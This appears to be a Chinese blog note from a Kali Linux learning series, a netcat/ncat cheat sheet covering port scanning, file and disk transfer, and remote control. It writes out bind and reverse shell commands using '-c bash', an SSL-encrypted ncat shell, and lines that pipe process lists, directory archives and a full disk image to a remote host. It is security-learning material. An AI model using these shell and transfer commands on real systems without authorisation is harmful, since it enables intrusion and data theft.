查看头文件

nc -nv 0.0.0.0 IP地址 80 端口号(类telnet功能)
head /

聊天功能(传输是明文)
nc相互传输文本信息(两台电脑实现类聊天功能)

A:nc -lp 4444(打开监听一个端口)
B:nc -nv 0.0.0.0(目标IP) 4444

电子取证

文件收集
nc -lp 4444 > ps.txt(将4444端口接受的信息直接传到ps.txt,可以当日志查看自己的端口是否有被入侵)
ps aux | nc -nv 0.0.0.0 4444 -q 1(将进程信息发给4444端口一秒后退出)
lsof(收集系统的所有打开文件的内容)
收集目录(将文件进行打包)
tar -cvf - sublime/ | nc -lp 333 -q 1(nc -lp 333 -q1<atr -cvf - sublime/)
nc -nv 0.0.0.0 333 | tar -xvf -(nc -nv 0.0.0.0 333>tar -xvf -)

加密传输文件

nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > aaa.txt
mcrypt --flush -Fbqd -a rijndael-256 -m ecb < aaa.txt | nc -nv 0.0.0.0 333 -q 1

流媒体服务器

cat 1.mp4 |  nc -lp 333
nc -nv 0.0.0.0 333 | mplayer -vo x11 -cache 3000 -

端口扫描

nc -nvz 0.0.0.0 1-65535
nc -nvzu 0.0.0.0 1-1024(查看1-1024的udp端口)

远程克隆硬盘

nc -lp 333 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 0.0.0.0 333 -q 1

远程控制

正向
nc -lp 333 -c bash(Windows用cmd)
nc -nv 0.0.0.0 333
反向(在目标服务器开启可连端口执行nc就可以实现第二次访问)
nc -lp 333
nc -nv 0.0.0.0 333 -c bash
-c bash 就是可获取本地的bash窗口(在哪里获取哪里的)

ncat(由于nc是不加密的,明文传输容易被嗅探,我们也可以用ncat)

建立远程连接(ssl加密)

ncat -c bash --allow 0.0.0.0 -nvl 333 --ssl(--allow允许一个指定IP连接)
ncat -nv 0.0.0.0 333 --ssl


Kali学习笔记      网络安全

本博客所有文章除特别声明外,均采用 CC BY-SA 3.0协议 。转载请注明出处!